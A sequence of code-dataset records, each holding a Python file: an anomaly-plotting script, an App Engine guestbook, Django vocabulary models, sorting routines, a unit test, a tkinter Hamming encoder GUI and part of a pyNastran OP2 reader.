gamma=0.1)\nprint(input_vector2)\ny_rbf = svr_rbf.fit(input_vector, output_vector).predict(input_vector2)\ni =0\nj=0\nimp = {}\nfor a in input_vector2 :\n cd =datetime.datetime.fromordinal(int(yo1[i]))\n curr_date = cd.date()\n diff = float(y_rbf[i]) - float(output_vector2[i])\n diff = diff * diff\n if curr_date in imp:\n imp[curr_date] = imp[curr_date] + diff\n else :\n imp[curr_date] = diff\n\n if cd.weekday() == arg1 :\n vals = vals + [y_rbf[i]]\n j = j+1\n \n if j == 24:\n j=0\n print (len(vals))\n plt.plot(xdates,vals,linestyle='-', color=np.random.rand(3,1),label=str(curr_date))\n vals = []\n \n i = i+1\n \n \nsorted_x = sorted(imp.items(), key=operator.itemgetter(1))\nfor key in sorted_x:\n print(key)\nplt.legend()\nplt.show()","sub_path":"python_files/anomaly2.py","file_name":"anomaly2.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"36014298","text":"#coding=utf-8\r\nfrom utility import constants\r\nimport jinja2\r\nimport os\r\nimport re\r\nimport urllib\r\nimport logging\r\nimport datetime\r\njinja_environment = jinja2.Environment(\r\n\tloader=jinja2.FileSystemLoader(os.path.dirname(__file__)))\r\n\r\nimport cgi\r\nfrom utility.datemodel import *\r\nimport webapp2\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.ext.db import stats\r\nfrom google.appengine.api import users\r\nfrom google.appengine.api 
import memcache\r\n\r\n\r\ndef check_email (str):\t\r\n\tp = re.compile(r\"(?:^|\\s)[-a-z0-9_.+]+@(?:[-a-z0-9]+\\.)+[a-z]{2,6}(?:\\s|$)\", re.IGNORECASE)\r\n\tif (p.search(str)):\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\ndef check_nickname (str):\r\n\t'''本来计划的是用来检查昵称是否可用\r\n\t现阶段先空着,昵称没啥好检查的'''\r\n\treturn True\r\n\t\r\nclass IndexPage(webapp2.RequestHandler):\r\n\t'''用来显示首页'''\r\n\tdef get(self):\r\n\t\ttemplate = jinja_environment.get_template('template/index.html')\r\n\t\tself.response.out.write(template.render())\r\n\r\nclass IntrPage(webapp2.RequestHandler):\r\n\t'''用来显示介绍页'''\r\n\tdef get(self):\r\n\t\ttemplate = jinja_environment.get_template('template/introduction.html')\r\n\t\tself.response.out.write(template.render())\r\n\r\nclass ContactPage(webapp2.RequestHandler):\r\n\t'''用来显示联系方式页'''\r\n\tdef get(self):\r\n\t\ttemplate = jinja_environment.get_template('template/contact.html')\r\n\t\tself.response.out.write(template.render())\r\n\r\nclass TestPage(webapp2.RequestHandler):\r\n\t'''用来显示待建设的页面'''\r\n\tdef get(self):\r\n\t\ttemplate = jinja_environment.get_template('template/underconstruction.html')\r\n\t\tself.response.out.write(template.render())\t\r\n\t\t\r\nclass MessagePage(webapp2.RequestHandler):\r\n\t'''用来显示留言板'''\r\n\tdef get(self):\r\n\t\terror_messages = [u'',\r\n\t\t\t\t\t\t\tu'请输入昵称(Please Enter a Nickname)',\r\n\t\t\t\t\t\t\tu'请输入您的邮箱(Please Enter your E-mail)',\r\n\t\t\t\t\t\t\tu'请输入您的留言内容(Please Enter the Content)',\r\n\t\t\t\t\t\t\tu'您输入的邮箱格式不合法(The E-mail Does Not Exist)']\r\n\t\ttemplate_values = {}\r\n\t\terrors= self.request.get('errors')\r\n\t\tnum = self.request.get('num') \t\t\t#指示显示第几页,用来导航\r\n\t\tcounter_total = Counter.gql('WHERE name = :1','message.total')\r\n\t\tif errors:\r\n\t\t\terrors = int (errors)\r\n\t\telse:\r\n\t\t\terrors = 0\r\n\t\t\t\r\n\t\ttemplate_values ['errors'] = errors\r\n\t\ttemplate_values ['error_message'] = error_messages[errors]\r\n\t\tif not num:\r\n\t\t\tnum = 1\r\n\t\telse:\r\n\t\t\tnum = int(num)\r\n\t\tif num <= 0:\r\n\t\t\tnum = 1\r\n\t\t\r\n\t\tif counter_total.count()==1:\r\n\t\t\tcounter_total = counter_total[0]\r\n\t\t\tpage_count_total = counter_total.value / constants.MESSAGE_PER_PAGE #计算一共有几页\r\n\t\t\tif (counter_total.value % constants.MESSAGE_PER_PAGE !=0):\r\n\t\t\t\tpage_count_total +=1\r\n\t\t\ttemplate_values ['page_count_total'] = page_count_total\r\n\t\t\tif (page_count_total ==0):\r\n\t\t\t\tfirst_num = 0\r\n\t\t\telse:\r\n\t\t\t\tif (num > page_count_total):\r\n\t\t\t\t\tnum = page_count_total\r\n\t\t\t\tfirst_num = constants.MESSAGE_PER_PAGE*(num-1)\r\n\t\t\t\t\r\n\r\n\t\t\ttemplate_values ['debug_info'] = []\r\n\t\t\ttemplate_values ['messages'] = Message.gql('ORDER BY date').fetch(constants.MESSAGE_PER_PAGE,first_num)\r\n\t\t\ttemplate_values ['num'] = num\r\n\t\t\ttemplate_values ['page_count_total'] = page_count_total\r\n\t\t\ttemplate_values ['message_per_page'] = constants.MESSAGE_PER_PAGE\r\n\t\t\t\r\n\t\ttemplate = jinja_environment.get_template(r'template/message.html')\r\n\t\tself.response.out.write(template.render(template_values))\t\r\n\t\t\t\t\t\t\t\t\t\r\n\tdef post(self):\r\n\t\terrors = 0\r\n\t\tnickname = self.request.get ('nickname').strip()\r\n\t\temail = self.request.get ('email').strip()\r\n\t\tcontent = self.request.get('content').strip()\r\n\t\t\r\n\t\tif (len(nickname) == 0):\r\n\t\t\terrors = 1\r\n\t\tif (len(email) ==0):\r\n\t\t\terrors = 2\r\n\t\tif (len(content) == 0):\r\n\t\t\terrors = 3\r\n\t\tif (not check_email(email)):\r\n\t\t\terrors = 4\r\n\t\t\r\n\t\tif 
(errors == 0):\r\n\t\t\tc = Counter.gql('WHERE name = :1', 'message.total')\r\n\t\t\tif (c.count() ==1):\r\n\t\t\t\tcounter_total = c[0]\r\n\t\t\t\tcounter_total.value += 1\r\n\t\t\telif (c.count() == 0):\r\n\t\t\t\tcounter_total = Counter()\r\n\t\t\t\tcounter_total.name = 'message.total'\r\n\t\t\t\tcounter_total.value = 1\r\n\t\t\telse:\r\n\t\t\t\tlogging.error ('MessagePage: post --same counter message.total--')\r\n\t\t\t\tself.response.out.write('服务器端数据库有误,相同counter')\r\n\t\t\t\treturn\r\n\t\t\r\n\t\t\t#查找原来的数据库中是否用名字叫message.total的项\r\n\t\t\t#没有就新建,有就把value项加一。\r\n\t\t\t#message.total的意思是现在一共有多少个message。这样设置是因为可能有的message会被删除。\r\n\t\t\tmessage = Message ()\r\n\t\t\tmessage.author = nickname\r\n\t\t\tmessage.content = content\r\n\t\t\tmessage.email = db.Email(email)\r\n\t\t\tmessage.date += datetime.timedelta(hours=+8)\r\n\t\t\t\r\n\t\t\tcounter_total.put()\r\n\t\t\tmessage.put()\r\n\t\t\tpage = counter_total.value / constants.MESSAGE_PER_PAGE\r\n\t\t\tif (counter_total.value % constants.MESSAGE_PER_PAGE != 0):\r\n\t\t\t\tpage +=1\r\n\t\t\tself.redirect('/message?' + urllib.urlencode({'num':page}))\r\n\t\telse:\r\n\t\t\tself.redirect('/message?' + urllib.urlencode({'errors': errors}))\r\n\r\nindexpage = webapp2.WSGIApplication([('/index', IndexPage),\r\n\t\t\t\t\t\t\t\t\t('/', IndexPage),\r\n\t\t\t\t\t\t\t\t\t('/introduction', IntrPage),\r\n\t\t\t\t\t\t\t\t\t('/contact', ContactPage),\r\n\t\t\t\t\t\t\t\t\t('/message', MessagePage),\r\n\t\t\t\t\t\t\t\t\t('/message/([0-9]+)', MessagePage),\r\n\t\t\t\t\t\t\t\t ('/.*', TestPage)\r\n\t\t\t\t\t\t\t\t\t],\r\n\t\t\t\t\t\t\t\t\tdebug=True)\r\n\t\t\t\t\t\t\t\t\t\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373062216","text":"from django.conf import settings\nfrom django.contrib.postgres.fields import JSONField\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom core.models import (\n LanguageModel, OrderedModel, SerializeModel,\n SlugifyModel, TimestampModel, TrackedFieldModel\n)\nfrom core.utils import tag_text\nfrom .managers import (\n VocabContextManager, VocabContextEntryManager,\n VocabEntryManager, VocabSourceManager\n)\n\n\n# Abstract models\n\nclass CreatorModel(models.Model):\n creator = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n related_name=\"%(app_label)s_%(class)s\",\n on_delete=models.CASCADE\n )\n\n class Meta:\n abstract = True\n\n\nclass VocabSourceContentModel(models.Model):\n\n class Meta:\n abstract = True\n\n def get_vocab_source(self):\n raise NotImplementedError(\"Method get_source needs to be implemented.\")\n\n\nclass JsonDataModel(models.Model):\n json_data = JSONField()\n\n class Meta:\n abstract = True\n\n\n# Concrete models\n\nclass VocabEntry(\n TimestampModel, LanguageModel, SlugifyModel,\n SerializeModel, TrackedFieldModel\n):\n unique_slug = False\n value_field_name = \"entry\"\n max_iterations = 500\n tracked_fields = [\"language\", \"entry\"]\n\n entry = models.CharField(\n verbose_name=_(\"label_entry\"),\n max_length=255,\n )\n description = models.TextField(\n verbose_name=_(\"label_description\"),\n blank=True\n )\n\n objects = VocabEntryManager()\n\n class Meta:\n verbose_name = _(\"label_vocab_entry\")\n verbose_name_plural = _(\"label_vocab_entry_plural\")\n unique_together = (\"entry\", \"language\")\n\n def __str__(self):\n return self.entry\n\n def save(self, force_insert=False, force_update=False, 
*args, **kwargs):\n # If language or entry changed, delete related json entry\n if self.id:\n if self.field_changed(\"language\") or self.field_changed(\"entry\"):\n if VocabEntryJsonData.objects.filter(vocab_entry_id=self.id).exists():\n VocabEntryJsonData.objects.filter(vocab_entry_id=self.id).delete()\n\n super(VocabEntry, self).save(*args, **kwargs)\n\n def get_serializer(self):\n from .serializers import VocabEntrySerializer\n return VocabEntrySerializer\n\n\nclass VocabSource(\n TimestampModel, SlugifyModel, SerializeModel,\n CreatorModel\n):\n \"\"\"\n A model for vocab sources that contain the contexts.\n \"\"\"\n\n BOOK = 1\n WEBSITE = 2\n BLOG = 3\n CREATED = 4\n OTHER = 5\n SOURCE_TYPE_CHOICES = (\n (BOOK, _(\"label_source_book\")),\n (WEBSITE, _(\"label_source_website\")),\n (BLOG, _(\"label_source_blog\")),\n (CREATED, _(\"label_source_created\")),\n (OTHER, _(\"label_source_other\")),\n )\n unique_slug = True\n value_field_name = \"name\"\n max_iterations = 500\n\n name = models.CharField(\n verbose_name=_(\"label_name\"),\n max_length=255,\n )\n description = models.TextField(\n verbose_name=_(\"label_description\"),\n blank=True\n )\n source_type = models.IntegerField(\n verbose_name=_(\"label_vocab_source_type\"),\n choices=SOURCE_TYPE_CHOICES,\n default=CREATED,\n )\n\n objects = VocabSourceManager()\n\n class Meta:\n verbose_name = _(\"label_vocab_source\")\n verbose_name_plural = _(\"label_vocab_source_plural\")\n unique_together = (\"creator\", \"name\")\n\n def __str__(self):\n return self.name\n\n def get_serializer(self):\n from .serializers import VocabSourceSerializer\n return VocabSourceSerializer\n\n\nclass VocabContext(\n TimestampModel, SerializeModel,\n VocabSourceContentModel, OrderedModel\n):\n group_field = \"vocab_source_id\"\n\n vocab_source = models.ForeignKey(\n VocabSource,\n related_name=\"vocab_contexts\",\n on_delete=models.CASCADE\n )\n vocab_entries = models.ManyToManyField(\n VocabEntry,\n through=\"VocabContextEntry\",\n related_name=\"vocab_context_entry\"\n )\n content = models.TextField(\n verbose_name=_(\"label_content\"),\n )\n\n objects = VocabContextManager()\n\n class Meta:\n verbose_name = _(\"label_vocab_context\")\n verbose_name_plural = _(\"label_vocab_context_plural\")\n\n def __str__(self):\n return self.content\n\n def get_serializer(self):\n from .serializers import VocabContextSerializer\n return VocabContextSerializer\n\n def get_entries_and_tags(self):\n \"\"\"\n Returns a list of all of the context's vocab entries along with their\n corresponding tags (i.e., entry instances in the context.)\n\n Note: Consider prefetching vocabcontextentry_set in querysets to avoid multiple calls.\n \"\"\"\n entries_tags = []\n context_entries = self.vocabcontextentry_set.all()\n for context_entry in context_entries:\n vocab_entry = context_entry.vocab_entry\n entries_tags.append({\n \"vocab_entry\": {\n \"id\": vocab_entry.id,\n \"entry\": vocab_entry.entry,\n \"language\": vocab_entry.language,\n \"slug\": vocab_entry.slug\n },\n \"tags\": context_entry.get_vocab_entry_tags()\n })\n return entries_tags\n\n def get_vocab_source(self):\n return self.vocab_source\n\n\nclass VocabContextEntry(\n TimestampModel, SerializeModel, VocabSourceContentModel\n):\n vocab_entry = models.ForeignKey(\n VocabEntry,\n on_delete=models.CASCADE\n )\n vocab_context = models.ForeignKey(\n VocabContext,\n on_delete=models.CASCADE\n )\n\n objects = VocabContextEntryManager()\n\n class Meta:\n verbose_name = _(\"label_vocab_entry_context\")\n verbose_name_plural = 
_(\"label_vocab_entry_context_plural\")\n unique_together = (\"vocab_entry\", \"vocab_context\")\n\n def __str__(self):\n return \"vocab_entry: {0}, vocab_context: {1}\".format(\n self.vocab_entry_id,\n self.vocab_context_id\n )\n\n def get_serializer(self):\n from .serializers import VocabContextEntrySerializer\n return VocabContextEntrySerializer\n\n def get_vocab_entry_tags(self):\n \"\"\"\n Returns a list of the content of the object's VocabEntryTags.\n \"\"\"\n tags = []\n for tag in self.vocab_entry_tags.all():\n tags.append(tag.content)\n tags.sort()\n return tags\n\n def get_tagged_context(self):\n tags = self.get_vocab_entry_tags()\n tagged_text = tag_text(tags, self.vocab_context.content)\n return tagged_text\n\n def add_vocab_entry_tag(self, tag):\n VocabEntryTag.objects.create(\n vocab_context_entry=self,\n content=tag\n )\n\n def remove_vocab_entry_tag(self, tag):\n VocabEntryTag.objects.filter(\n vocab_context_entry=self,\n content=tag\n ).delete()\n\n def get_vocab_source(self):\n return self.vocab_context.vocab_source\n\n\nclass VocabContextAudio(\n TimestampModel, SlugifyModel,\n SerializeModel, VocabSourceContentModel\n):\n unique_slug = False\n slug_value_field_name = \"name\"\n slug_max_iterations = 500\n\n creator = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n related_name=\"%(app_label)s_%(class)s\",\n on_delete=models.CASCADE\n )\n vocab_context = models.ForeignKey(\n VocabContext,\n related_name=\"vocab_context_audios\",\n on_delete=models.CASCADE\n )\n name = models.CharField(\n verbose_name=_(\"label_name\"),\n max_length=255,\n )\n audio_url = models.URLField(\n verbose_name=_(\"label_audio_url\")\n )\n\n def get_serializer(self):\n from .serializers import VocabContextAudioSerializer\n return VocabContextAudioSerializer\n\n def get_vocab_source(self):\n return self.vocab_source.vocab_source\n\n\nclass VocabEntryTag(VocabSourceContentModel):\n vocab_context_entry = models.ForeignKey(\n VocabContextEntry,\n related_name=\"vocab_entry_tags\",\n on_delete=models.CASCADE\n )\n content = models.TextField(\n verbose_name=_(\"label_content\"),\n )\n\n def get_vocab_source(self):\n return self.vocab_context_entry.vocab_context.vocab_source\n\n def __str__(self):\n return self.content\n\n\nclass VocabEntryJsonData(JsonDataModel):\n OXFORD = 1\n MIRIAM_WEBSTER = 2\n COLINS = 3\n OTHER = 4\n JSON_DATA_SOURCE_CHOICES = (\n (OXFORD, _(\"label_json_data_oxford\")),\n (MIRIAM_WEBSTER, _(\"label_json_data_miriam_webster\")),\n (COLINS, _(\"label_json_data_colins\")),\n (OTHER, _(\"label_json_data_other\"))\n )\n\n vocab_entry = models.ForeignKey(\n VocabEntry,\n related_name=\"%(app_label)s_%(class)s\",\n on_delete=models.CASCADE\n )\n json_data_source = models.IntegerField(\n verbose_name=_(\"label_vocab_source_type\"),\n choices=JSON_DATA_SOURCE_CHOICES,\n default=OTHER\n )\n","sub_path":"nublado/vocab/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633776857","text":"class sortclass(object):\n def __init__(self, a):\n self.a = a\n\n def bubblesort(self):\n leng = len(self.a)\n for i in range(leng-2):\n for j in range(0, leng-i-1):\n if self.a[j] > self.a[j+1]:\n self.a[j],self.a[j+1] = self.a[j+1],self.a[j]\n\n\n def quicky(self, arr):\n if len(arr) <= 1:\n return arr\n else:\n pivot = len(arr) // 2\n pivotele = arr[pivot]\n left = [x for x in arr if x < pivotele]\n right = [x for x in arr if x > pivotele]\n\n return self.quicky(left) + 
[pivotele] + self.quicky(right)\n\n def quicksort(self):\n self.a = self.quicky(self.a)\n\n\n def merge(self,arr):\n if len(arr) <= 1:\n return arr\n elif len(arr) == 2:\n if arr[0] > arr[1]:\n arr[0],arr[1] = arr[1],arr[0]\n return arr\n else:\n pivot = int(len(arr)/2)\n left = self.merge(arr[:pivot])\n right = self.merge(arr[pivot:])\n\n leftind = 0\n rightind = 0\n newarr = []\n while(leftind < len(left) and rightind < len(right)):\n if left[leftind] < right[rightind]:\n newarr.append(left[leftind])\n leftind += 1\n elif left[leftind] > right[rightind]:\n newarr.append(right[rightind])\n rightind += 1\n else:\n newarr.append(left[leftind])\n newarr.append(left[leftind])\n leftind += 1\n rightind += 1\n\n if leftind == len(left) and rightind != len(right):\n newarr += right[rightind:]\n\n if rightind == len(right) and leftind != len(left):\n newarr += left[leftind:]\n\n return newarr\n\n def mergesort(self):\n self.a = self.merge(self.a)\n\n\n def countsort(self):\n leng = len(self.a)\n K = 50\n B = [0] * K\n C = [0] * K\n\n for ele in self.a:\n C[ele] += 1\n\n for i in range(1, K): # gets no of elements less than current index\n C[i] += C[i-1]\n\n for i in range(leng-1, -1, -1):\n B[C[self.a[i]] - 1] = self.a[i]\n C[self.a[i]] -= 1\n\n return B[:leng]\n\n def insertionsort(self):\n for i in range(1, len(self.a)):\n x = self.a[i]\n j = i-1\n while j >= 0 and self.a[j] > x:\n self.a[j+1] = self.a[j]\n j -= 1\n self.a[j+1] = x\n return\n\n\n\n#alist = [54, 26, 93, 17, 77, 31, 44, 55, 20, -1, -10, -5]\nalist = [1, 1, 4, 3, 2, 5, 5, 6, 8, 8, 6, 14, 12, 16,13,20, 19]\ns = sortclass(alist)\nprint(\"Original array\")\nprint(s.a)\nif 0:\n s.bubblesort()\n print(\"After bubble sort\")\n print(s.a)\nif 0:\n print(\"After quick sort\")\n s.quicksort()\n print(s.a)\nif 0:\n print(\"After merge sort\")\n s.mergesort()\n print(s.a)\nif 0:\n print(\"After counting sort\")\n print(s.countsort())\nif 1:\n print(\"After insertion sort\")\n s.insertionsort()\n print(s.a)\n\n","sub_path":"datastructures_algorithms/Arrays/Array-Sorting.py","file_name":"Array-Sorting.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"619678951","text":"from __future__ import absolute_import, unicode_literals, print_function\r\nimport unittest\r\nfrom datetime import datetime\r\nfrom libraries.app.app import App\r\nfrom libraries.door43_tools.project_search import ProjectSearch\r\nfrom libraries.models.manifest import TxManifest\r\n\r\n\r\nclass ProjectSearchTest(unittest.TestCase):\r\n\r\n def setUp(self):\r\n \"\"\"Runs before each test.\"\"\"\r\n App(prefix='{0}-'.format(self._testMethodName), db_connection_string='sqlite:///:memory:')\r\n self.items = {}\r\n self.init_items()\r\n self.populate_table()\r\n\r\n def init_items(self):\r\n self.items = {\r\n 'Door43/en_obs': {\r\n 'repo_name': 'en_obs',\r\n 'user_name': 'Door43',\r\n 'lang_code': 'en',\r\n 'resource_id': 'obs',\r\n 'resource_type': 'book',\r\n 'title': 'Open Bible Stories',\r\n 'views': 2,\r\n 'last_updated': datetime.utcnow(),\r\n 'manifest': '',\r\n },\r\n 'JohnDoe/en_obs': {\r\n 'repo_name': 'en_obs',\r\n 'user_name': 'JohnDoe',\r\n 'lang_code': 'en',\r\n 'resource_id': 'obs',\r\n 'resource_type': 'book',\r\n 'title': 'Open Bible Stories',\r\n 'views': 2,\r\n 'last_updated': datetime.strptime('2016-12-21T05:23:01Z', '%Y-%m-%dT%H:%M:%SZ'),\r\n 'manifest': '',\r\n },\r\n 'francis/fr_ulb': {\r\n 'repo_name': 'fr_ulb',\r\n 'user_name': 'francis',\r\n 'lang_code': 
'fr',\r\n 'resource_id': 'ulb',\r\n 'resource_type': 'bundle',\r\n 'title': 'Unlocked Literal Bible',\r\n 'views': 12,\r\n 'last_updated': datetime.strptime('2017-02-11T15:43:11Z', '%Y-%m-%dT%H:%M:%SZ'),\r\n 'manifest': '',\r\n },\r\n }\r\n\r\n def populate_table(self):\r\n for idx in self.items:\r\n tx_manifest = TxManifest(**self.items[idx])\r\n App.db.add(tx_manifest)\r\n App.db.commit()\r\n\r\n def test_search_projects_for_en(self):\r\n search = ProjectSearch()\r\n criterion = {\r\n \"minViews\": 1,\r\n \"daysForRecent\": 365,\r\n \"languages\": \"[en]\",\r\n \"returnedFields\": \"repo_name, user_name, title, lang_code, last_updated, views\"\r\n }\r\n results = search.search_projects(criterion)\r\n self.assertIsNone(search.error)\r\n self.assertEqual(len(results), 2)\r\n\r\n def test_search_projects_for_en_fr(self):\r\n search = ProjectSearch()\r\n criterion = {\r\n \"minViews\": 1,\r\n \"daysForRecent\": 365,\r\n \"languages\": \"[en,fr]\",\r\n \"returnedFields\": \"repo_name, user_name, title, lang_code, last_updated, views\"\r\n }\r\n results = search.search_projects(criterion)\r\n self.assertIsNone(search.error)\r\n self.assertEqual(len(results), 3)\r\n","sub_path":"tests/door43_tools_tests/test_project_search.py","file_name":"test_project_search.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452621149","text":"import tkinter as tk\nfrom Encoder import encoder\nfrom Decoder import decoder\n\n\ndef encode():\n output, output_steps = encoder(encode_data.get(), encode_radio.get(), encode_secded.get(), int(encode_bits_option.get()))\n output_text.set(output)\n encode_explanation = \"\"\n for i in output_steps:\n encode_explanation = encode_explanation + i\n tex.delete('1.0', tk.END)\n tex.insert(tk.END, encode_explanation)\n tex.see(tk.END)\n\ndef decode():\n output = decoder(decode_data.get(), decode_radio.get(), decode_secded.get(), int(decode_bits_option.get()))\n output_text_decoder.set(output)\n\ndef step():\n count_step = count_step_var.get()\n output, output_steps = encoder(encode_data.get(), encode_radio.get(), encode_secded.get(),\n int(encode_bits_option.get()))\n encode_explanation = \"\"\n counter = 0\n for i in output_steps:\n if counter <= count_step:\n encode_explanation = encode_explanation + i\n counter += 1\n output_text.set(output)\n tex.delete('1.0', tk.END)\n tex.insert(tk.END, encode_explanation)\n tex.see(tk.END)\n count_step_var.set(count_step + 1)\n\ndef reset():\n output_text.set(\"\")\n tex.delete('1.0', tk.END)\n count_step_var.set(0)\n\n\n\n\n\nwin = tk.Tk()\nwin.title(\"Hamming Encoder/Decoder\")\nwin.geometry(\"490x500\")\nwin.resizable(width=False, height=False)\n\n\n# Setup encode interface\nencode_data = tk.Entry(width=60)\nencode_button = tk.Button(win, text=\"Encode\", command=encode)\n\nencode_bits = []\nfor i in range(1, 65):\n encode_bits.append(i)\nencode_bits_option = tk.StringVar(win)\nencode_bits_option.set(encode_bits[0])\nencode_dropdown = tk.OptionMenu(win, encode_bits_option, *encode_bits)\n\nencode_radio = tk.StringVar()\nencode_binary_radio = tk.Radiobutton(win, text=\"Binary\", variable=encode_radio, value=\"binary\")\nencode_decimal_radio = tk.Radiobutton(win, text=\"Decimal\", variable=encode_radio, value=\"decimal\")\nencode_hex_radio = tk.Radiobutton(win, text=\"Hexadecimal\", variable=encode_radio, value=\"hex\")\nencode_radio.set(\"binary\")\n\nencode_secded = tk.BooleanVar()\nencode_secsed_radio = tk.Radiobutton(win, 
text=\"SECSED\", variable=encode_secded, value=False)\nencode_secded_radio = tk.Radiobutton(win, text=\"SECDED\", variable=encode_secded, value=True)\nencode_secded.set(False)\n\nlabel_encoder = tk.Label(win)\nlabel_encoder[\"text\"] = \"Encoder\"\n\noutput_text = tk.StringVar()\nencode_output = tk.Entry(win, textvariable=output_text, state='readonly', width=40)\nscroll = tk.Scrollbar(win, orient='horizontal', command=encode_output.xview)\nencode_output.config(xscrollcommand=scroll.set)\nencode_output_label = tk.Label(win)\nencode_output_label[\"text\"] = \"Encoder Output: \"\n\ntexLabel = tk.Label(win)\ntexLabel[\"text\"] = \"Explanation: \"\n\ntex = tk.Text(win, width=50, height=10, state='normal', wrap=tk.NONE, bg=win.cget(\"background\"))\nscroll_tex = tk.Scrollbar(win, orient='horizontal', command=tex.xview)\n\ncount_step_var = tk.IntVar(0)\nstep_button = tk.Button(win, text=\"Step\", command=step)\n\nreset_button = tk.Button(win, text=\"Reset\", command=reset)\n\n\nlabel_encoder.grid(row=0, column=0, sticky=\"W\")\nencode_data.grid(row=1, column=0)\nencode_dropdown.grid(row=1, column=1)\nencode_button.grid(row=1, column=2, sticky=\"E\")\nstep_button.grid(row=2, column=2, sticky=\"E\")\nreset_button.grid(row=3, column=2, sticky=\"E\")\nencode_binary_radio.grid(row=2, column=0, sticky=\"W\")\nencode_decimal_radio.grid(row=3, column=0, sticky=\"W\")\nencode_hex_radio.grid(row=4, column=0, sticky=\"W\")\ntexLabel.grid(row=7, column=0, sticky=\"W\")\ntex.grid(row=7, column=0, columnspan=3, sticky=\"E\")\nscroll_tex.grid(row=8, column=1)\nencode_output.grid(row=5, column=0, sticky=\"E\", columnspan=3)\nscroll.grid(row=6, column=1, sticky=\"N\")\nencode_output_label.grid(row=5, column=0, sticky=\"W\")\nencode_secsed_radio.grid(row=2, column=1, sticky=\"W\")\nencode_secded_radio.grid(row=3, column=1, sticky=\"W\")\n\n# Decoder\ndecode_data = tk.Entry(width=60)\n\ndecode_button = tk.Button(win, text=\"Decode\", command=decode)\n\ndecode_bits = []\nfor i in range(1, 65):\n decode_bits.append(i)\ndecode_bits_option = tk.StringVar(win)\ndecode_bits_option.set(decode_bits[0])\ndecode_dropdown = tk.OptionMenu(win, decode_bits_option, *decode_bits)\n\ndecode_radio = tk.StringVar()\ndecode_binary_radio = tk.Radiobutton(win, text=\"Binary\", variable=decode_radio, value=\"binary\")\ndecode_decimal_radio = tk.Radiobutton(win, text=\"Decimal\", variable=decode_radio, value=\"decimal\")\ndecode_hex_radio = tk.Radiobutton(win, text=\"Hexadecimal\", variable=decode_radio, value=\"hex\")\ndecode_radio.set(\"binary\")\n\ndecode_secded = tk.BooleanVar()\ndecode_secsed_radio = tk.Radiobutton(win, text=\"SECSED\", variable=decode_secded, value=False)\ndecode_secded_radio = tk.Radiobutton(win, text=\"SECDED\", variable=decode_secded, value=True)\ndecode_secded.set(False)\n\nlabel_decoder = tk.Label(win)\nlabel_decoder[\"text\"] = \"Decoder\"\n\noutput_text_decoder = tk.StringVar()\ndecoder_output = tk.Entry(win, state='readonly', textvariable=output_text_decoder, width=40)\nscroll_decoder = tk.Scrollbar(win, orient='horizontal', command=decoder_output.xview)\ndecoder_output.config(xscrollcommand=scroll.set)\ndecoder_output_label = tk.Label(win)\ndecoder_output_label[\"text\"] = \"Decoder Output: \"\n\nlabel_decoder.grid(row=8, column=0, sticky=\"W\")\ndecode_data.grid(row=9, column=0)\ndecode_dropdown.grid(row=9, column=1)\ndecode_button.grid(row=9, column=2)\ndecode_binary_radio.grid(row=10, column=0, sticky=\"W\")\ndecode_decimal_radio.grid(row=11, column=0, sticky=\"W\")\ndecode_hex_radio.grid(row=12, 
column=0, sticky=\"W\")\n\ndecoder_output.grid(row=13, column=0, sticky=\"E\", columnspan=3)\nscroll_decoder.grid(row=14, column=1, sticky=\"N\")\ndecoder_output_label.grid(row=13, column=0, sticky=\"W\")\ndecode_secsed_radio.grid(row=10, column=1, sticky=\"W\")\ndecode_secded_radio.grid(row=11, column=1, sticky=\"W\")\n\nwin.mainloop()","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622736850","text":"from six.moves import range\nfrom struct import Struct, unpack\nfrom pyNastran.op2.op2_common import OP2Common\n\nclass OGS(OP2Common):\n def __init__(self):\n OP2Common.__init__(self)\n\n def _read_ogs1_3(self, data):\n three = self.parse_approach_code(data)\n self.words = [\n 'aCode', 'tCode', '???', 'isubcase',\n '???', '???', '???', 'dLoadID'\n 'format_code', 'num_wide', 'o_code', '???',\n 'acoustic_flag','???', '???', '???',\n '???', '???', '???', '???',\n '???', '???', 'thermal', '???',\n '???', 'Title', 'subtitle', 'label']\n\n self.parse_approach_code(data)\n #isubcase = self.get_values(data, 'i', 4)\n\n ## surface/volumeID\n self.ID = self.add_data_parameter(data, 'ID', 'i', 3, False)\n\n #: Reference coordinate system ID\n self.refid = self.add_data_parameter(data, 'refid', 'i', 8, False)\n\n ## format code\n self.format_code = self.add_data_parameter(data, 'format_code', 'i', 9, False)\n\n ## number of words per entry in record\n self.num_wide = self.add_data_parameter(data, 'num_wide', 'i', 10, False)\n\n ## Stress/Strain code\n self.sCode = self.add_data_parameter(data, 'sCode', 'i', 11, False)\n\n ## Output Coordinate System\n self.oCoord = self.add_data_parameter(data, 'oCoord', 'i', 12, False)\n\n ## Axis Specification code\n self.axis = self.add_data_parameter(data, 'axis', 'i', 13, False)\n\n #: Normal Specification Code\n self.normal = self.add_data_parameter(data, 'normal', 'i', 14, False)\n\n #print \"dLoadID(8)=%s format_code(9)=%s num_wide(10)=%s oCode(11)=%s thermal(23)=%s\" %(self.dLoadID,self.format_code,self.num_wide,self.oCode,self.thermal)\n if not self.is_sort1():\n raise NotImplementedError('sort2...')\n\n ## assuming tCode=1\n if self.analysis_code == 1: # statics\n ## load set number\n self.lsdvmn = self.add_data_parameter(data, 'lsdvmn', 'i', 5, False)\n self.dataNames = self.apply_data_code_value('dataNames', ['lsdvmn'])\n 